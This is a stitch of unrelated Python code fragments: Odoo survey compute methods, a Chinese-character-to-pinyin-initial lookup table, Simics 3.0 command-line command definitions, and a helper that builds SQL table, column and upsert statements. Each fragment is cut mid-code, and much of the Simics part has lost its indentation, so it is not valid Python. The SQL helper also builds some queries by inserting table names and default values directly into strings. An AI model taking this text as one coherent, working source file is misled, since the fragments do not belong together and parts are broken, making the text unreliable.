        survey.question_ids = survey.question_and_page_ids - pages
@api.depends('question_and_page_ids.is_conditional', 'users_login_required', 'access_mode')
def _compute_is_attempts_limited(self):
    # Force the flag off when attempts cannot be counted reliably: fully
    # public surveys without login (anonymous attendees) or surveys with
    # conditional questions. Otherwise the stored/user-set value is kept
    # (store=True, readonly=False on the field).
    for survey in self:
        if not survey.is_attempts_limited or \
                (survey.access_mode == 'public' and not survey.users_login_required) or \
                any(question.is_conditional for question in survey.question_and_page_ids):
            survey.is_attempts_limited = False
@api.depends('session_start_time', 'user_input_ids')
def _compute_session_answer_count(self):
    """ We have to loop since our result is dependent of the survey.session_start_time.
    This field is currently used to display the count about a single survey, in the
    context of sessions, so it should not matter too much. """
    for survey in self:
        answer_count = 0
        # Count open (not 'done') session answers created since the current
        # session started; one read_group per survey (see docstring).
        input_count = self.env['survey.user_input'].read_group(
            [('survey_id', '=', survey.id),
             ('is_session_answer', '=', True),
             ('state', '!=', 'done'),
             ('create_date', '>=', survey.session_start_time)],
            ['create_uid:count'],
            ['survey_id'],
        )
        if input_count:
            answer_count = input_count[0].get('create_uid', 0)
        survey.session_answer_count = answer_count
@api.depends('session_question_id', 'session_start_time', 'user_input_ids.user_input_line_ids')
def _compute_session_question_answer_count(self):
""" We have to loop since our result is dependent of | |
[u'k'] ,
u'㢁' : [u'c'] ,
u'夀' : [u's'] ,
u'綃' : [u'x', u's'] ,
u'騂' : [u'x'] ,
u'䄐' : [u'q'] ,
u'斓' : [u'l'] ,
u'舒' : [u'y', u's'] ,
u'椠' : [u'q'] ,
u'亥' : [u'h'] ,
u'莧' : [u'x', u'w', u'h'] ,
u'刲' : [u'k'] ,
u'皵' : [u'q'] ,
u'霴' : [u'd'] ,
u'㥀' : [u'd'] ,
u'穂' : [u's'] ,
u'叇' : [u'd'] ,
u'铉' : [u'x'] ,
u'扒' : [u'p', u'b'] ,
u'篗' : [u'y'] ,
u'顖' : [u'x'] ,
u'佤' : [u'w'] ,
u'揧' : [u'l'] ,
u'聦' : [u'c'] ,
u'駫' : [u'j'] ,
u'睴' : [u'g'] ,
u'䳹' : [u'k'] ,
u'臻' : [u'z'] ,
u'傆' : [u'y'] ,
u'閈' : [u'h'] ,
u'樍' : [u'j'] ,
u'碖' : [u'l'] ,
u'土' : [u't'] ,
u'蠡' : [u'l'] ,
u'悦' : [u'y'] ,
u'㨭' : [u'h'] ,
u'缯' : [u'c', u'z'] ,
u'躺' : [u't'] ,
u'朿' : [u'c'] ,
u'鵃' : [u'z'] ,
u'痈' : [u'y'] ,
u'䁑' : [u'y'] ,
u'蕓' : [u'y'] ,
u'廚' : [u'c'] ,
u'鏜' : [u't'] ,
u'㝟' : [u'm', u'w'] ,
u'桡' : [u'r', u'n'] ,
u'䛪' : [u'q', u'w'] ,
u'啳' : [u'q', u'j'] ,
u'陵' : [u'l'] ,
u'滺' : [u'y', u'd'] ,
u'㶅' : [u'x'] ,
u'錆' : [u'q'] ,
u'沏' : [u'q'] ,
u'徙' : [u'x'] ,
u'瀜' : [u'y', u'r'] ,
u'躣' : [u'q'] ,
u'䞩' : [u'r', u'e'] ,
u'㲯' : [u'r'] ,
u'鈰' : [u's'] ,
u'䬶' : [u'e'] ,
u'澹' : [u's', u'd', u't'] ,
u'廃' : [u'f'] ,
u'獆' : [u'h'] ,
u'觍' : [u't'] ,
u'㿙' : [u'p'] ,
u'鵚' : [u't'] ,
u'滣' : [u'c'] ,
u'蕪' : [u'w'] ,
u'姭' : [u'x'] ,
u'牰' : [u'y', u'c'] ,
u'裷' : [u'y', u'g'] ,
u'䇽' : [u'z'] ,
u'笁' : [u'z'] ,
u'鲄' : [u'h'] ,
u'喊' : [u'h'] ,
u'挑' : [u't'] ,
u'蒔' : [u's'] ,
u'创' : [u'c'] ,
u'败' : [u'b'] ,
u'稫' : [u'b'] ,
u'斪' : [u'q'] ,
u'咴' : [u'h'] ,
u'戻' : [u'l'] ,
u'螾' : [u'y'] ,
u'嵅' : [u'g'] ,
u'糄' : [u'b'] ,
u'㗊' : [u'j'] ,
u'豏' : [u'x'] ,
u'䕕' : [u'm'] ,
u'擔' : [u'd'] ,
u'默' : [u'm'] ,
u'埞' : [u'd'] ,
u'浥' : [u'y'] ,
u'蛨' : [u'm'] ,
u'屯' : [u'z', u't'] ,
u'翮' : [u'h', u'l'] ,
u'㓴' : [u'r', u'j'] ,
u'轹' : [u'l'] ,
u'䑿' : [u's'] ,
u'柾' : [u'j'] ,
u'㚉' : [u'g'] ,
u'圈' : [u'q', u'j'] ,
u'残' : [u'c'] ,
u'鐊' : [u'y'] ,
u'㨖' : [u'z'] ,
u'缘' : [u'y'] ,
u'傝' : [u't'] ,
u'閟' : [u'b'] ,
u'木' : [u'm'] ,
u'㮫' : [u'h'] ,
u'碭' : [u'd'] ,
u'餬' : [u'h'] ,
u'䰺' : [u'j'] ,
u'悽' : [u'q'] ,
u'脼' : [u'l'] ,
u'髁' : [u'k'] ,
u'㝈' : [u'l'] ,
u'瑊' : [u'z', u'j'] ,
u'苑' : [u'y'] ,
u'兜' : [u'd'] ,
u'痟' : [u'x'] ,
u'陞' : [u's'] ,
u'祬' : [u'z'] ,
u'勱' : [u'm'] ,
u'音' : [u'y'] ,
u'慼' : [u'q'] ,
u'鮀' : [u't'] ,
u'簅' : [u'c'] ,
u'于' : [u'y', u'x'] ,
u'莐' : [u'c'] ,
u'搕' : [u'k'] ,
u'夗' : [u'y', u'w'] ,
u'鸙' : [u'y'] ,
u'皞' : [u'h'] ,
u'䄧' : [u'r'] ,
u'蘩' : [u'f'] ,
u'厰' : [u'c'] ,
u'邲' : [u'b'] ,
u'椷' : [u'h', u'j'] ,
u'節' : [u'j'] ,
u'噉' : [u'd'] ,
u'譋' : [u'l'] ,
u'提' : [u's', u't', u'd'] ,
u'繙' : [u'f'] ,
u'䣢' : [u'j'] ,
u'跤' : [u'q', u'j'] ,
u'晩' : [u'w'] ,
u'孫' : [u'x', u's'] ,
u'顭' : [u'h'] ,
u'烲' : [u'c'] ,
u'䍻' : [u'x'] ,
u'聽' : [u't'] ,
u'娄' : [u'l'] ,
u'皇' : [u'h', u'w'] ,
u'褎' : [u'y', u'x'] ,
u'钛' : [u't'] ,
u'㬚' : [u'c'] ,
u'䶡' : [u's', u'z'] ,
u'樤' : [u't'] ,
u'央' : [u'y'] ,
u'疱' : [u'p'] ,
u'蠸' : [u'q'] ,
u'䄾' : [u'r'] ,
u'鯅' : [u's', u't'] ,
u'㩄' : [u's'] ,
u'䳋' : [u'z', u't'] ,
u'楎' : [u'h'] ,
u'菕' : [u'l'] ,
u'塘' : [u't'] ,
u'瓛' : [u'h'] ,
u'轢' : [u'l'] ,
u'䁨' : [u'h'] ,
u'髯' : [u'r'] ,
u'㥮' : [u'z'] ,
u'叵' : [u'p'] ,
u'桸' : [u'x'] ,
u'苿' : [u'w'] ,
u'徂' : [u'c'] ,
u'焉' : [u'y'] ,
u'躌' : [u'w'] ,
u'䞒' : [u'd'] ,
u'㢘' : [u'l'] ,
u'霝' : [u'l'] ,
u'䠣' : [u'x'] ,
u'澢' : [u'd'] ,
u'庬' : [u'p', u'm'] ,
u'瀳' : [u'j'] ,
u'趶' : [u'k'] ,
u'䚼' : [u'n'] ,
u'陇' : [u'l'] ,
u'位' : [u'w'] ,
u'滌' : [u'd'] ,
u'巖' : [u'y'] ,
u'睝' : [u'l'] ,
u'賠' : [u'p'] ,
u'㻬' : [u't'] ,
u'镱' : [u'y'] ,
u'乷' : [u's'] ,
u'淶' : [u'l'] ,
u'崀' : [u'l'] ,
u'禃' : [u'z'] ,
u'鸂' : [u'q', u'x'] ,
u'憓' : [u'h'] ,
u'龗' : [u'l'] ,
u'洠' : [u'm'] ,
u'䪥' : [u'x', u'd'] ,
u'嘲' : [u'c', u'z'] ,
u'犵' : [u'q', u'h', u'j', u'g'] ,
u'錴' : [u'l'] ,
u'㵀' : [u'c', u'z'] ,
u'繂' : [u's'] ,
u'埇' : [u'y'] ,
u'郉' : [u'x'] ,
u'晒' : [u's'] ,
u'翗' : [u'q'] ,
u'鱖' : [u'j', u'g'] ,
u'䭤' : [u'q'] ,
u'柧' : [u'g'] ,
u'葦' : [u'w'] ,
u'鷫' : [u's'] ,
u'㙲' : [u'y'] ,
u'獴' : [u'm'] ,
u'䣹' : [u'f'] ,
u'藻' : [u'z'] ,
u'咆' : [u'p'] ,
u'醈' : [u't'] ,
u'渍' : [u'z'] ,
u'粖' : [u'm'] ,
u'匟' : [u'k'] ,
u'谡' : [u's'] ,
u'撦' : [u'c'] ,
u'笯' : [u'n'] ,
u'誺' : [u'c'] ,
u'挿' : [u'c', u'z'] ,
u'屁' : [u'p'] ,
u'饃' : [u'm'] ,
u'燈' : [u'd'] ,
u'䑑' : [u'p'] ,
u'腓' : [u'f'] ,
u'嫚' : [u'm'] ,
u'韜' : [u't'] ,
u'污' : [u'y', u'w'] ,
u'关' : [u'w', u'g'] ,
u'鉵' : [u't'] ,
u'櫺' : [u'l'] ,
u'㦅' : [u'd'] ,
u'霆' : [u't'] ,
u'䰌' : [u'z'] ,
u'梏' : [u'j', u'g'] ,
u'宙' : [u'z'] ,
u'琜' : [u'l'] ,
u'誣' : [u'w'] ,
u'㢯' : [u'm'] ,
u'阰' : [u'p'] ,
u'伶' : [u'l'] ,
u'殹' : [u'y'] ,
u'嫃' : [u'z'] ,
u'睆' : [u'h'] ,
u'跍' : [u'k'] ,
u'䋓' : [u'z'] ,
u'㯙' : [u'c'] ,
u'饚' : [u'h'] ,
u'习' : [u'x'] ,
u'櫣' : [u'l'] ,
u'腪' : [u'y'] ,
u'癰' : [u'y'] ,
u'賷' : [u'q', u'j'] ,
u'䗽' : [u'w'] ,
u'缁' : [u'z'] ,
u'预' : [u'y'] ,
u'冊' : [u'c'] ,
u'肔' : [u'y'] ,
u'嘛' : [u'm'] ,
u'禚' : [u'z'] ,
u'褥' : [u'r', u'n'] ,
u'縫' : [u'f'] ,
u'憪' : [u'x'] ,
u'鮮' : [u'x'] ,
u'㜱' : [u'z', u'd'] ,
u'傴' : [u'y'] ,
u'昻' : [u'a'] ,
u'莾' : [u'm'] ,
u'奅' : [u'p'] ,
u'磄' : [u't'] ,
u'衏' : [u'y'] ,
u'惔' : [u't', u'd'] ,
u'高' : [u'g'] ,
u'㙛' : [u'b'] ,
u'叞' : [u'w'] ,
u'楥' : [u'y', u'x'] ,
u'苨' : [u'n'] ,
u'塯' : [u'l'] ,
u'篮' : [u'l'] ,
u'譹' : [u'h', u'x'] ,
u'䁿' : [u'm'] ,
u'揾' : [u'w'] ,
u'匈' : [u'x'] ,
u'澋' : [u'h', u'j'] ,
u'逊' : [u'x'] ,
u'笘' : [u's'] ,
u'咝' : [u's'] ,
u'醟' : [u'y'] ,
u'挨' : [u'a'] ,
u'鴬' : [u'y'] ,
u'撽' : [u'q'] ,
u'蔼' : [u'a'] ,
u'黁' : [u'n'] ,
u'灊' : [u'q'] ,
u'蛑' : [u'm'] ,
u'㓝' : [u'x'] ,
u'啜' : [u'c'] ,
u'營' : [u'y', u'c'] ,
u'鉞' : [u'y', u'h'] ,
u'絬' : [u'x'] ,
u'囱' : [u'c'] ,
u'鏳' : [u'z'] ,
u'敼' : [u'x'] ,
u'龀' : [u'c'] ,
u'㬃' : [u't'] ,
u'砅' : [u'l'] ,
u'螐' : [u'w'] ,
u'怕' : [u'p'] ,
u'崗' : [u'g'] ,
u'騙' : [u'p'] ,
u'䔧' : [u'l'] ,
u'舩' : [u'c'] ,
u'钲' : [u'z'] ,
u'洷' : [u'z'] ,
u'翀' : [u'c'] ,
u'剉' : [u'c'] ,
u'轋' : [u'h'] ,
u'某' : [u'm'] ,
u'㵗' : [u'p', u'f'] ,
u'穙' : [u'p'] ,
u'䳢' : [u'q'] ,
u'觤' : [u'g'] ,
u'扩' : [u'k'] ,
u'彫' : [u'd'] ,
u'鱭' : [u'j'] ,
u'㟰' : [u'm'] ,
u'葽' : [u'y'] ,
u'膁' : [u'q', u'l'] ,
u'昄' : [u'b'] ,
u'䪇' : [u'b'] ,
u'馑' : [u'j'] ,
u'縔' : [u's'] ,
u'贞' : [u'z'] ,
u'熡' : [u'l'] ,
u'嘤' : [u'y'] ,
u'肫' : [u'c', u'z', u't'] ,
u'攮' : [u'n'] ,
u'䦱' : [u'k', u'w'] ,
u'颻' : [u'y'] ,
u'紾' : [u'z', u't'] ,
u'豈' : [u'q', u'k'] ,
u'烋' : [u'x'] ,
u'啎' : [u'w'] ,
u'㧑' : [u'w'] ,
u'摘' : [u'z'] ,
u'韥' : [u'd'] ,
u'籨' : [u'l'] ,
u'譲' : [u'r'] ,
u'呸' : [u'p'] ,
u'㣻' : [u'y'] ,
u'萃' : [u'c'] ,
u'掂' : [u'd'] ,
u'䴉' : [u'x'] ,
u'鰓' : [u'x', u's'] ,
u'箒' : [u'z'] ,
u'誜' : [u's'] ,
u'琣' : [u'p'] ,
u'厢' : [u'x'] ,
u'茭' : [u'q', u'x', u'j'] ,
u'抬' : [u't'] ,
u'鬽' : [u'm'] ,
u'窼' : [u'c', u'z'] ,
u'视' : [u's'] ,
u'獍' : [u'j'] ,
u'勌' : [u'j'] ,
u'艗' : [u'y'] ,
u'懖' : [u'g'] ,
u'䭝' : [u'k'] ,
u'驧' : [u'j'] ,
u'秦' : [u'q'] ,
u'裰' : [u'd'] ,
u'牷' : [u'q'] ,
u'凶' : [u'x'] ,
u'㭽' : [u'd'] ,
u'愀' : [u'q'] ,
u'䖃' : [u'y'] ,
u'蚅' : [u'e'] ,
u'礐' : [u'q'] ,
u'嶓' : [u'b'] ,
u'麕' : [u'q', u'j'] ,
u'儠' : [u'l'] ,
u'㖣' : [u't'] ,
u'鈢' : [u'n'] ,
u'皥' : [u'h'] ,
u'樲' : [u'e'] ,
u'亵' : [u'x'] ,
u'鎷' : [u'm'] ,
u'䉂' : [u'l'] ,
u'蝄' : [u'w'] ,
u'毇' : | |
process itself, useful for
various things (such as attaching a remote debugger).""", filename="/mp/simics-3.0/src/core/common/generic_commands.py", linenumber="1894")
#
# -------------------- readme --------------------
#
def readme_cmd():
    # Print the Simics README text returned by the core API.
    print SIM_readme()

new_command("readme", readme_cmd,
            [],
            type = ["Help"],
            short = "print information about Simics",
            doc = """
Prints various useful information (README) about Simics.""", filename="/mp/simics-3.0/src/core/common/generic_commands.py", linenumber="1894")
#
# -------------------- license --------------------
#
def license_cmd():
    # SIM_license prints the license text itself (returns nothing useful).
    SIM_license()

new_command("license", license_cmd,
            [],
            type = ["Help"],
            short = "print simics license",
            doc = """
Prints the LICENSE that applies to this copy of Simics.""", filename="/mp/simics-3.0/src/core/common/generic_commands.py", linenumber="1923")
#
# -------------------- copyright --------------------
#
def copyright_cmd():
    # SIM_copyright prints the copyright text itself.
    SIM_copyright()

new_command("copyright", copyright_cmd,
            [],
            type = ["Help"],
            short = "print full Simics copyright information",
            doc = """
Prints the complete copyright information that applies to this copy of Simics.""", filename="/mp/simics-3.0/src/core/common/generic_commands.py", linenumber="1937")
#
# -------------------- version --------------------
#
def version_cmd(verbose):
if verbose:
print "%s (%s)\n" % (SIM_version(), SIM_snapshot_date())
print "build-id: %d" % conf.sim.version
print SIM_version_sub()
else:
print SIM_version()
print
new_command("version", version_cmd,
[arg(flag_t, "-v")],
type = ["Help"],
short = "display Simics version",
doc = """
Prints the Simics version. With the <tt>-v</tt> flag, compiler version
and compile dates are printed as well.
""", filename="/mp/simics-3.0/src/core/common/generic_commands.py", linenumber="1957");
#
# -------------------- quiet --------------------
#
quiet_mode = 0
def quiet_cmd(mode):
global quiet_mode
if mode not in [-1,0,1]:
print "Illegal mode"
return
if mode == -1:
quiet_mode = 1 - quiet_mode
else:
quiet_mode = mode
SIM_set_quiet(quiet_mode)
if quiet_mode:
print "[simics] Switching on quiet mode."
else:
print "[simics] Switching off quiet mode."
new_command("quiet", quiet_cmd,
[arg(int_t, "mode", "?", -1)],
type = "internal commands",
short = "toggle quiet mode",
doc = """
Switches quiet mode to given value.
Sets Simics to 'quiet' mode if the value is 1, or turns off
quiet mode if the value is 0, or toggles if the value is -1.
See also the 'verbose' command. Default is to toggle.""", filename="/mp/simics-3.0/src/core/common/generic_commands.py", linenumber="1990")
#
# -------------------- verbose --------------------
#
verbose_mode = 0
def verbose_cmd(mode):
global verbose_mode
if mode not in [-1,0,1]:
print "Illegal mode"
return
if mode == -1:
verbose_mode = 1 - verbose_mode
else:
verbose_mode = mode
SIM_set_verbose(verbose_mode)
if verbose_mode:
print "[simics] Switching on verbose mode."
else:
print "[simics] Switching off verbose mode."
new_command("verbose", verbose_cmd,
[arg(int_t, "mode", "?", -1)],
type = "internal commands",
short = "toggle verbose mode",
doc = """
Switches verbose mode to given value.
Sets Simics to 'verbose' mode if the value is 1, or turns off
verbose mode if the value is 0, or toggles if the value is -1.
See also the 'quiet' command. Default is to toggle.""", filename="/mp/simics-3.0/src/core/common/generic_commands.py", linenumber="2024")
#
# -------------------- = --------------------
#
def assignment_command(name, value):
if name[0] == '%':
if not value[0] == int_t:
print "Value is not an integer."
SIM_command_has_problem()
return
(cpu, _) = get_cpu()
return obj_write_reg_cmd(cpu, name[1:], cast(uint64_t, value[1]))
elif name.startswith('$$'):
name = name[2:]
local = 1
elif name[0] == '$':
name = name[1:]
local = 0
else:
local = 0
print ('Deprecation warning: variable assignment without variable '
'prefix $.')
if conf.prefs.fail_on_warnings:
SIM_quit(1)
get_current_locals().set_variable_value(name, value[1], local)
# do not return anything (avoid execution of string assignments)
new_command("=", assignment_command,
[arg(str_t, doc = "name"),
arg((int_t, str_t, float_t),
("ival", "sval", "fval"), doc = "value")],
type = ["Command-Line Interface"],
short = "set an environment variable",
pri = -100,
infix = 1,
doc = """
Set a Simics environment variable to an integer or string value.
Or assigns a value to a processor register.""", filename="/mp/simics-3.0/src/core/common/generic_commands.py", linenumber="2061")
#
# -------------------- [ --------------------
#
def array_command(name, idx, rw, value):
if name[0] != '$':
print "Indexing only supported for variables"
SIM_command_has_problem()
return
if name.startswith('$$'):
name = name[2:]
local = 1
else:
name = name[1:]
local = 0
space = get_current_locals()
if rw[2] == '-r':
try:
return getattr(space, name)[idx]
except Exception, msg:
return
else:
try:
space.set_variable_value_idx(name, value[1], local, idx)
except:
print "Failed setting variable."
SIM_command_has_problem()
return
new_command("[", array_command,
[arg(str_t, "variable"),
arg(int_t, "idx"),
arg((flag_t, flag_t), ('-r', '-w')),
arg((int_t, str_t), ('ival', 'sval'), doc = 'value')],
type = ["Command-Line Interface"],
short = "",
pri = 750,
infix = 1,
doc = """
""", filename="/mp/simics-3.0/src/core/common/generic_commands.py", linenumber="2103")
#
# -------------------- unset --------------------
#
def unset_command(all, names):
if all:
rlist = [x for x in get_current_locals().get_all_variables().keys()
if x not in names]
else:
rlist = names
for n in rlist:
try:
get_current_locals().remove_variable(n)
except:
print 'Unset failed for $%s.' % n
new_command("unset", unset_command,
[arg(flag_t, "-a"),
arg(str_t, "variables", "*")],
type = ["Command-Line Interface"],
short = "remove a environment variable",
doc = """
Removes (unsets) a Simics environment variable. The <arg>-a</arg> flag causes
all variables to be removed, <em>except</em> the ones specified as
<arg>variables</arg>.
""", filename="/mp/simics-3.0/src/core/common/generic_commands.py", linenumber="2132")
#
# -------------------- += --------------------
#
def inc_environment_variable(name, value):
    # Add *value* to a CLI variable ($name) or a processor register (%name).
    # *value* is a (type, payload) pair from the CLI argument machinery.
    if name[0] == '%':
        # Register target: only integer increments make sense.
        if not value[0] == int_t:
            print "Value is not an integer."
            SIM_command_has_problem()
            return
        (cpu, _) = get_cpu()
        value = cast(uint64_t, obj_read_reg_cmd(cpu, name[1:]) + value[1])
        return obj_write_reg_cmd(cpu, name[1:], value)
    elif name[0] == '$':
        name = name[1:]
    else:
        print 'Deprecation warning: variable assignment without variable prefix $.'
        if conf.prefs.fail_on_warnings:
            SIM_quit(1)
    space = get_current_locals()
    if space.get_all_variables().has_key(name):
        # Existing variable: re-tag its raw value as a (type, payload)
        # pair so plus() sees the same form as the incoming value.
        old = getattr(space, name)
        if isinstance(old, str):
            old = (str_t, old)
        else:
            old = (int_t, old)
    else:
        # Unset variable: start from the neutral element of value's type.
        if value[0] == int_t:
            old = (value[0], 0)
        else:
            old = (str_t, '')
    setattr(space, name, plus(old, value))
    return getattr(space, name)
new_command("+=", inc_environment_variable,
            [arg(str_t, doc = "name"),
             arg((int_t, str_t), ("ival", "sval"), doc = "value")],
            type = ["Command-Line Interface"],
            short = "set an environment variable",
            pri = -100,
            infix = 1,
            doc = """
Add a string or integer to a Simics environment variable, or an integer
value to a register.""", filename="/mp/simics-3.0/src/core/common/generic_commands.py", linenumber="2178")
#
# -------------------- -= --------------------
#
def dec_environment_variable(name, value):
if name[0] == '%':
(cpu, _) = get_cpu()
value = cast(uint64_t, obj_read_reg_cmd(cpu, name[1:]) - value)
return obj_write_reg_cmd(cpu, name[1:], value)
elif name[0] == '$':
name = name[1:]
else:
print 'Deprecation warning: variable assignment without variable prefix $.'
if conf.prefs.fail_on_warnings:
SIM_quit(1)
space = get_current_locals()
if space.get_all_variables().has_key(name):
old = getattr(space, name)
if not isinstance(old, (int, long)):
print "Variable is not an integer."
SIM_command_has_problem()
return
else:
old = 0
setattr(space, name, minus(old, value))
return getattr(space, name)
new_command("-=", dec_environment_variable,
[arg(str_t, doc = "name"),
arg(int_t, "value")],
type = ["Command-Line Interface"],
short = "set an environment variable",
pri = -100,
infix = 1,
doc = """
Subtract an integer from a Simics environment variable, or from a
register.""", filename="/mp/simics-3.0/src/core/common/generic_commands.py", linenumber="2218")
#
# -------------------- $ --------------------
#
def environment_var_expander(comp):
    """Tab-completion helper: complete against current variable names."""
    names = get_current_locals().get_all_variables().keys()
    return get_completions(comp, names)
def get_environment_variable(name):
    """Return the value of CLI variable *name* from the current scope."""
    scope = get_current_locals()
    return getattr(scope, name)
new_command("$", get_environment_variable,
            [arg(str_t, "name", expander = environment_var_expander)],
            type = ["Command-Line Interface"],
            short = "get the value of an environment variable",
            pri = 2000,
            check_args = 0,
            doc = """
Gets the value of a Simics environment variable, like in <tt>print $var</tt>.""", filename="/mp/simics-3.0/src/core/common/generic_commands.py", linenumber="2240")
#
# -------------------- list-vars --------------------
#
def list_vars_cmd():
l = []
m = 0
d = get_current_locals().get_all_variables()
for k in d.keys():
l.append((k,d[k]))
m = max(m, len(k))
l.sort()
for v in l:
print "%-*s =" % (m, v[0]), v[1]
new_command("list-vars", list_vars_cmd,
[],
type = ["Command-Line Interface"],
short = "list environment variables",
doc = """
Lists all Simics environment variables and their current
values. Environment variables can be used to store temporary
values. To set a variable, write <tt>variable = value</tt> at the
Simics prompt. The value can be of type integer, string, or float. To
access a variable, prefix the name with a <tt>$</tt>, e.g.,
<tt>$variable</tt>. A variable can be put wherever an expression can be
used. For example:
<tt>simics> tmp = %pc + 4</tt><br/>
<tt>simics> count = 10</tt><br/>
<tt>simics> disassemble $tmp $count</tt><br/>
They can also be accessed from Python by using the name space simenv:
<tt>simics> $foo = 1 + 4 * 4</tt><br/>
<tt>simics> @print simenv.foo</tt><br/>
<tt>17</tt><br/>
<tt>simics> @simenv.bar = "hello"</tt><br/>
<tt>simics> echo $bar</tt><br/>
<tt>hello</tt>
""", filename="/mp/simics-3.0/src/core/common/generic_commands.py", linenumber="2265")
#
# -------------------- list-namespaces --------------------
#
def list_namespaces_cmd(name_sort):
    # List all command namespaces: one table of objects by class, one of
    # objects by interface.  With -n (name_sort) both tables are sorted
    # by object name instead of by class/interface name.
    l = []
    i = []
    m = 0
    # Find all interfaces used as command namespaces
    iface_namespaces = []
    for cmd in simics_commands():
        iface = cmd["namespace"]
        if iface:
            try:
                # A "namespace" that is really a class name is not an
                # interface; drop it.
                if SIM_get_class(iface) == iface:
                    iface = None
            except SimExc_General:
                pass
        if iface and not iface in iface_namespaces:
            iface_namespaces.append(iface)
    for o in SIM_get_all_objects():
        namespace = o.name
        classname = o.classname
        l = l + [ [ "<" + classname + ">", namespace ] ]
        for iface in iface_namespaces:
            if instance_of(o, iface):
                i = i + [ [ "<" + iface + ">", namespace ] ]
    if name_sort:
        # Sort on the second column (the object name).
        l.sort(lambda a, b: cmp(a[1], b[1]))
        i.sort(lambda a, b: cmp(a[1], b[1]))
    else:
        l.sort()
        i.sort()
    print_columns([ Just_Left, Just_Left ],
                  [ [ "Class", "Namespace (Object)" ] ] + l)
    print ""
    print_columns([ Just_Left, Just_Left ],
                  [ [ "Interface", "Namespace (Object)" ] ] + i)
new_command("list-namespaces", list_namespaces_cmd,
[arg(flag_t, "-n")],
type = ["Command-Line Interface", "Help"],
short | |
given fields
#
# Maybe set the field's values as defaults.
#
# Set as primary key the index_column (if given); this will
# normally be the RunID and there is a limitation in that it
# can't be an unlimited length SQL type; hence we set it in
# self.sql_types_by_field to be a vachar(255) (if anyone sets
# a RunID longer than 255, ... their problem. FIXME: needs
# runtime verification)
#
# The SQL command is basically
#
# create table TABLENAME (
# FIELD1 TYPE1 [default DEFAULT1],
# FIELD2 TYPE2 [default DEFAULT2],
# ...,
# [primary key ( FIELDx );
#
if defaults:
cmd = f"create table if not exists `{table_name}` ( " \
+ ", ".join(
f"`{field}` {self.sql_type(field, value)} default ?"
for field, value in fields.items()
) \
+ ( f", primary key (`{index_column}`)" if index_column else "" ) \
+ " );"
values = tuple(self.defaults_map.get(column, None)
for column in fields)
cursor.execute(cmd, values)
else:
cmd = f"create table if not exists `{table_name}` ( " \
+ ", ".join(
f"`{field}` {self.sql_type(field, value)}"
for field, value in fields.items()
) \
+ (
f", primary key (`{index_column}`)"
if index_column else ""
) \
+ " );"
cursor.execute(cmd)
def _table_columns_update(self, cursor, table_name,
defaults = False, **fields):
# Add missing columns to a table, maybe setting defaults
#
# First list the current columns
cmd = \
f"select column_name" \
f" from information_schema.columns" \
f" where table_name = '{table_name}'"
cursor.execute(cmd)
columns = set(row[0] for row in cursor)
fields_wanted = fields.keys()
columns_missing = fields_wanted - columns
if not columns_missing:
return
# add new missing new columns
if defaults:
cmd = \
f"alter table `{table_name}` add ( " \
+ f", ".join(
f" `{column}` {self.sql_type(column, fields[column])}"
f" default {self.defaults_map.get(column, None)} "
for column in columns_missing
) + f" );"
else:
cmd = \
f"alter table `{table_name}` add ( " \
+ f", ".join(
f" `{column}` {self.sql_type(column, fields[column])}"
for column in columns_missing
) + " );"
cursor.execute(cmd)
def _table_row_insert(self, cursor, table_name, **fields):
# insert all the values in the specific columns
#
## insert into TABLENAME ( FIELD1, FIELD2...) data ( VALUE1, VALUE2...)
#
# note we use %s placeholders for the values, to let the
# python itnerface type them properly and pass execute() a
# tuple with the values
cmd = \
f"insert into `{table_name}` ( " \
" `" + "`, `".join(fields.keys()) + "` )" \
" values ( " + " , ".join("?" for _ in fields.values()) + " );"
cursor.execute(cmd, tuple(fields.values()))
    # NOTE(review): lru_cache on a bound method keys on `self` and keeps every
    # instance alive for the cache's lifetime (flake8-bugbear B019); the _tls /
    # _made_in_pid parameters appear to exist only to partition the cache per
    # thread and per process (see _id_maybe_encode) -- confirm intentional.
    @functools.lru_cache(maxsize = 2048)
    def _id_maybe_encode_cache(self, _tls, _made_in_pid, identifier, max_len):
        """
        If an identifier is longer than the maximum, convert it and
        register it.
        Register it in the *Field IDs* table so we can later refer to
        it as needed.
        :param str identifier: identifier to check and maybe convert
        :return str: identifier if (shorter than :data:`id_max_len`)
        or the encoded name if it was longer.
        """
        if len(identifier) >= max_len:
            # Too long: replace with a deterministic short hash ID and record
            # the mapping in the "Field IDs" table for later lookup.
            fieldid = commonl.mkid(identifier, 10)
            self.table_row_update("Field IDs", "FieldID", fieldid,
                                  **{ "Field Name": identifier })
            return "fieldid:" + fieldid
        return self._sql_id_esc(identifier)
def _id_maybe_encode(self, identifier, max_len = 32):
return self._id_maybe_encode_cache(
threading.get_ident(), os.getpid(),
identifier, max_len)
def _table_name_prepare(self, table_name, prefix_bare):
prefix_esc = self.table_name_prefix + self._sql_id_esc(prefix_bare)
prefix_len = len(self.table_name_prefix_raw) + len(prefix_bare)
_table_name = prefix_esc + self._id_maybe_encode(table_name, 64 - prefix_len)
return _table_name.strip() # table names can't start/end w space
    def table_row_update(self, table_name, index_column, index_value,
                         prefix_bare = "", **fields):
        """Insert or update one row keyed by *index_column* == *index_value*.

        If the table or any column does not exist yet, create/add it and
        retry the upsert until it succeeds.
        """
        # insert/update fields in a table
        #
        # Use the index value of the index column to find the row to
        # update or insert a new one if not present.
        #
        # If the table does not exist, create it; if any column is
        # missing, add them.
        _table_name = self._table_name_prepare(table_name, prefix_bare)
        connection = self._connection_get()
        with connection.cursor() as cursor:
            while True:
                # Now try to insert the row
                #
                # - if the primary key is duplicated, update the
                #   values
                #
                # Seriously this SQL thing...
                #
                ## insert into TABLENAME (
                ##     INDEX_COLUMN, FIELD1, FIELD2 ...)
                ##   values ( INDEX_VALUE, VALUE1, VALUE2 ... )
                ##   on duplicate key update
                ##     FIELD1 = value(FIELD1),
                ##     FIELD2 = value(FIELD2),
                ##     ...;
                #
                # If there is no row with INDEX_COLUMN with
                # INDEX_VALUE, insert it with those FIELDs,
                # otherwise, update it. Clear as mud--especially the
                # code.
                #
                # Thanks https://stackoverflow.com/a/41894298
                #
                # - if we get errors because the table or columns
                #   still do not exist, fix'em and
                #   try again
                try:
                    cmd = \
                        f"insert into `{_table_name}` (`{index_column}`, " \
                        + ", ".join(
                            f"`{self._sql_id_esc(column)}`"
                            for column in fields
                        ) \
                        + " ) values ( ?, " + ", ".join(
                            "?"
                            for column in fields
                        ) + " ) on duplicate key update " \
                        + ", ".join(
                            f"`{self._sql_id_esc(column)}` = values(`{self._sql_id_esc(column)}`)"
                            for column in fields
                        ) + ";"
